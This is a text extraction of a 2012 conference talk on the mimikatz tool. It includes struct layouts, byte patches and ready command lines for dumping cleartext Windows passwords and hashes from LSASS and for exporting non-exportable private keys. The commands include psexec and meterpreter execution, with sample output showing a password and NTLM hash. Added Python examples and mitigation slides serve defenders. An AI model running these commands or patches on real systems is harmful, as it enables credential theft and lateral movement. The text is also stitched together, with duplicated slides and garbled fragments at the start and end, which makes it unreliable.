ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz # sekurlsa::kerberos
Let's log in with a normal account.
After credentials protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
07/11/2012 Benjamin DELPY `gentilkiwi` - ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com - 27
Call stacks shown on the slide (innermost frame first):
lsasrv!LsaProtectMemory <- kerberos!KerbHideKey <- kerberos!KerbCreatePrimaryCredentials <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials
lsasrv!LsaProtectMemory <- kerberos!KerbHidePassword <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials
lsasrv!LsaProtectMemory <- msv1_0!NlpAddPrimaryCredential <- msv1_0!SspAcceptCredentials <- msv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemory <- wdigest!SpAcceptCredentials
lsasrv!LsaProtectMemory <- tspkg!TSHidePassword <- tspkg!SpAcceptCredentials
Kerberos part for password
Kerberos ticket part? Maybe ;)
mimikatz # sekurlsa::kerberos (nt6) - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]
Structure shown on the slide:
#include <windows.h>   /* DWORD, PVOID, BYTE, LUID */
#include <ntsecapi.h>  /* LSA_UNICODE_STRING */
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz # sekurlsa::kerberos (nt5) - workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear. Also labelled on the slide: KIWI_LIVESSP_PRIMARY_CREDENTIAL]
Structure shown on the slide:
#include <windows.h>   /* DWORD, PVOID, LUID */
#include <ntsecapi.h>  /* LSA_UNICODE_STRING */
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* [...] fields elided on the slide */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz # sekurlsa - demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz # sekurlsa::kerberos - "hu?"
OK, it works…
But why?
Not for all logons on NT5 (an unlock can be needed)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol…
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical…
- For password auth
  • password hash for the shared secret, but keeping the password in memory
- For full smartcard auth
  • No password on client
  • No hash on client
  - NTLM hash on client…
  - KDC sent it back as a gift
mimikatz # sekurlsa
All passwords in memory are encrypted, but in a reversible way, so they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take benefit of its keys when we called it.
Can it be fun to decrypt outside the process?
- Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz # sekurlsa - LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx
[Diagram: lsasrv globals inside lsass: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8]); mimikatz loads its own lsasrv and copies these values from lsass…]
mimikatz # sekurlsa - LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES
[Diagram: lsasrv globals inside lsass: InitializationVector (BYTE[16]), h3DesKey and hAesKey (key handles described by the structures below); mimikatz loads its own lsasrv and copies them from lsass…]
Structures shown on the slide:
#include <windows.h>   /* DWORD, PVOID, BYTE */
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz # sekurlsa - memo
Security Packages
Package          Symbols                                  Type
tspkg            tspkg!TSGlobalCredTable                  RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                    LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList       LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList            LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable     RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                  LIST_ENTRY
                 lsasrv!LogonSessionListCount             ULONG

Protection Keys (NT 5)
Key    Symbols
RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

Protection Keys (NT 6)
Key    Symbols
(IV)   lsasrv!InitializationVector
3DES   lsasrv!h3DesKey
AES    lsasrv!hAesKey
mimikatz # sekurlsa - memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full
Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
    msv1_0 :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
     * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
    kerberos :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    wdigest :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    tspkg :
     * Utilisateur  : Gentil Kiwi
     * Domaine      : vm-w8-rp-x
     * Mot de passe : waza1234
    livessp : n.t. (LUID KO)
mimikatz # sekurlsa - what we can do
Basics
- No physical access to the computer (first step to pass the hash, then pass the pass)
- No admin rights / system rights / debug privileges (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless ;))
- For privileged accounts, network logon instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
- Use a separate network (or forest) for privileged tasks
More in depth
- Force strong authentication (SmartCard & Token) ($ €)
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
- Stop shared secrets for authentication, push public/private stuff (like keys ;))
- Take opportunities to stop retro-compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz # crypto - what is it?
A little module that I wrote to:
- play with the Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public, in DER format
    - with private keys, in PFX format
  • Private keys, in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  • CryptoAPI, in mimikatz context
  • CNG, in LSASS context (again ;))
(module: mod_mimikatz_crypto)
mimikatz # crypto - how it's protected
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • At least, not without the master keys and/or the users' passwords
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by:
- Password
- Popup
  (a constraint for most users; unavailable for computer keys)
- Export/Archive flag not present:
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz # crypto::capi - how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
- cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz # crypto::capi - how it's exported (… level)
[Diagram, labels as on the slide: Process; CryptoAPI and RSA CSP; Ask to export Key -> Load Private Key -> DPAPI Decode -> Exportable? -> yes: Exported Key / no: NTE_BAD_KEY_STATE; PLAYSKOOL]
mimikatz # crypto::patchcapi - because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
    Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider       : Microsoft Enhanced Cryptographic Provider v1.0
    Type           : AT_KEYEXCHANGE
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz # crypto::patchcapi - because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz # crypto::patchcapi - demo time
Import, export, import as not exportable… export
mimikatz # crypto::patchcapi - limitations
Because:
- I'm lazy
- I've seen, in the majority of cases, RSA keys in real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz # crypto::cng - how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
mimikatz # crypto::cng - how it's exported (… level)
[Diagram, labels as on the slide: Process; CNG; RPC; KeyIso Service (LSASS Process); Ask to export Key -> Load Private Key -> DPAPI Decode -> Exportable? -> yes: Exported Key / no: NTE_NOT_SUPPORTED; PLAYSKOOL; NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP]
mimikatz # crypto::patchcng - because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportKeys
[user] Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité  : NON
    Taille clé     : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz # crypto::patchcng - because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
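Added example, not mimikatz code: it decodes the two branch encodings used in the crypto::patchcapi listing (jnz rel32, with the nop shifting the jmp by one byte) and in the crypto::patchcng listing above (jnz/jmp rel8), and reports what a defender comparing a module's mapped bytes against its on-disk copy would see at these sites: a conditional branch made unconditional with an unchanged target, 4 bytes changed in rsaenh and 1 in ncrypt. Addresses and bytes are the ones on the slides; nothing here locates or writes memory.

```python
import struct

# Opcode bytes for the branch forms that appear in the listings (32-bit x86).
JCC_REL32_PREFIX = 0x0F        # 0F 80..8F rel32 (jnz = 0F 85)
JMP_REL32 = 0xE9               # E9 rel32
JMP_REL8 = 0xEB                # EB rel8
NOP = 0x90


def decode_branch(addr, code):
    """Decode one branch at virtual address addr, skipping any leading NOPs.

    Returns (kind, target, length) with kind 'jcc' (conditional) or 'jmp'
    (unconditional); None when the bytes are not one of the four forms."""
    i = 0
    while i < len(code) and code[i] == NOP:
        i += 1
    rest, ip = code[i:], addr + i
    if len(rest) >= 6 and rest[0] == JCC_REL32_PREFIX and 0x80 <= rest[1] <= 0x8F:
        rel = struct.unpack_from('<i', rest, 2)[0]       # signed 32-bit displacement
        return 'jcc', (ip + 6 + rel) & 0xFFFFFFFF, i + 6
    if len(rest) >= 5 and rest[0] == JMP_REL32:
        rel = struct.unpack_from('<i', rest, 1)[0]
        return 'jmp', (ip + 5 + rel) & 0xFFFFFFFF, i + 5
    if len(rest) >= 2 and 0x70 <= rest[0] <= 0x7F:        # 7x rel8 (jnz = 75)
        rel = struct.unpack_from('<b', rest, 1)[0]        # signed 8-bit displacement
        return 'jcc', (ip + 2 + rel) & 0xFFFFFFFF, i + 2
    if len(rest) >= 2 and rest[0] == JMP_REL8:
        rel = struct.unpack_from('<b', rest, 1)[0]
        return 'jmp', (ip + 2 + rel) & 0xFFFFFFFF, i + 2
    return None


def changed_bytes(on_disk, in_memory):
    """Number of byte positions that differ (the '4 bytes' / '1 byte' of the slides)."""
    return sum(1 for a, b in zip(on_disk, in_memory) if a != b)


def classify_patch(addr, on_disk, in_memory):
    """Verdict for one branch site whose mapped bytes differ from the file on disk.

    A conditional branch turned into an unconditional one with the same target is
    exactly the 'export flag is never checked' rewrite these slides describe."""
    if on_disk == in_memory:
        return 'unchanged'
    before, after = decode_branch(addr, on_disk), decode_branch(addr, in_memory)
    if before and after and before[0] == 'jcc' and after[0] == 'jmp':
        if before[1] == after[1]:
            return 'conditional branch forced, same target 0x%08X' % after[1]
        return 'conditional branch forced, target moved to 0x%08X' % after[1]
    return 'modified, not a plain branch rewrite'


# Listings copied from the slides: (address, bytes on disk, bytes after the patch).
CAPI_SITES = [                                     # rsaenh.dll, crypto::patchcapi
    (0x0AC0B7CB, bytes.fromhex('0F8533C7FFFF'), bytes.fromhex('90E933C7FFFF')),
    (0x0AC1F749, bytes.fromhex('0F85B63BFFFF'), bytes.fromhex('90E9B63BFFFF')),
]
# ncrypt inside lsass, crypto::patchcng
CNG_SITE = (0x6C815210, bytes.fromhex('751C'), bytes.fromhex('EB1C'))


def report(sites):
    """Map every site to its verdict and the number of bytes that changed."""
    return [(hex(a), classify_patch(a, d, m), changed_bytes(d, m)) for a, d, m in sites]


if __name__ == '__main__':
    for row in report(CAPI_SITES + [CNG_SITE]):
        print(row)
```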
mimikatz # crypto::patchcng - demo time
Import, export, import as not exportable… export again
mimikatz # crypto::patchcng - limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz # crypto::patchcng - bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
- Yeah, like the good old certutil

Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
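Added example, not mimikatz or certutil code: a triage of certutil -store style output that places each private key in the taxonomy of these slides (rsaenh.dll CSPs inside the calling process, the software KSP inside lsass.exe, or something else to check for hardware backing), using the provider names from the patchcapi and patchcng limitation slides. It matches only the French certutil strings reproduced on the slides (other locales print different text, an assumption); certificates 0 and 1 of the sample are assembled from the slide output, certificates 2 and 3 are constructed placeholders.

```python
import re

# CryptoAPI providers listed on the crypto::patchcapi limitations slide, all based on rsaenh.dll.
RSAENH_CSPS = {
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
}
# The CNG provider crypto::patchcng deals with: keys held by keyiso inside lsass.exe.
SOFTWARE_KSP = 'Microsoft Software Key Storage Provider'

# French certutil strings as they appear on the slides (assumption: other locales differ).
CERT_HEADER = re.compile(r'^=+ Certificat (\d+) =+$')
FIELDS = {
    'subject': re.compile(r'^Objet\s*:\s*(.+)$'),
    'container': re.compile(r'^\s*Conteneur de clé\s*=\s*(.+)$'),
    'provider': re.compile(r'^\s*Fournisseur\s*=\s*(.+)$'),
}
NOT_EXPORTABLE = 'NE PEUT PAS être exportée'


def parse_certutil_store(text):
    """One dict per '================ Certificat N ================' block."""
    certs, cur = [], None
    for line in text.splitlines():
        m = CERT_HEADER.match(line.strip())
        if m:
            cur = {'index': int(m.group(1)), 'subject': None, 'container': None,
                   'provider': None, 'flagged_not_exportable': False}
            certs.append(cur)
            continue
        if cur is None:
            continue                      # text before the first certificate (store name)
        for key, rx in FIELDS.items():
            m = rx.match(line)
            if m:
                cur[key] = m.group(1).strip()
        if NOT_EXPORTABLE in line:
            cur['flagged_not_exportable'] = True
    return certs


def where_is_the_key(provider):
    """Place a provider in the talk's taxonomy: which process holds the key material."""
    if provider is None:
        return 'no private key'
    if provider in RSAENH_CSPS:
        return 'CryptoAPI: rsaenh.dll inside the calling process'
    if provider == SOFTWARE_KSP:
        return 'CNG: software KSP inside lsass.exe (keyiso)'
    return 'other provider: check whether it is hardware-backed'


def triage(text):
    """(index, subject, where the key lives, not-exportable marker seen) per certificate."""
    return [(c['index'], c['subject'], where_is_the_key(c['provider']),
             c['flagged_not_exportable']) for c in parse_certutil_store(text)]


# Constructed sample. Certificates 0 and 1 are assembled from the certutil output
# reproduced on the slides; 2 and 3 are invented placeholders for the other branches.
SAMPLE = """\
MY
================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
================ Certificat 1 ================
Objet : CN=cng-placeholder-subject
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
================ Certificat 2 ================
Objet : CN=smartcard-placeholder-subject
  Conteneur de clé = smartcard-placeholder-container
  Fournisseur = Microsoft Smart Card Key Storage Provider
Succès du test de chiffrement
================ Certificat 3 ================
Objet : CN=public-only-placeholder-subject
"""

if __name__ == '__main__':
    for row in triage(SAMPLE):
        print(row)
```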
mimikatz # crypto - memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz # crypto - what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer - no admin, no admin, no admin…
Basics
- Use smartcards/tokens for users' certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz # what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
- Play with tokens & privileges
- Display SSDT x86 & x64
- List minifilters actions
- List Notifications (process, thread, image, registry)
- List Objects hooks and procedures
- …
…
mimikatz # that's all folks
Thanks to:
- my girlfriend, for her support (her LSASS crashed a few times)
- Application Security Forum, for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft, for always considering it as normal/acceptable
- Security friends/community, for their ideas & challenges
  • nagual, newsoft, mubix, …
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
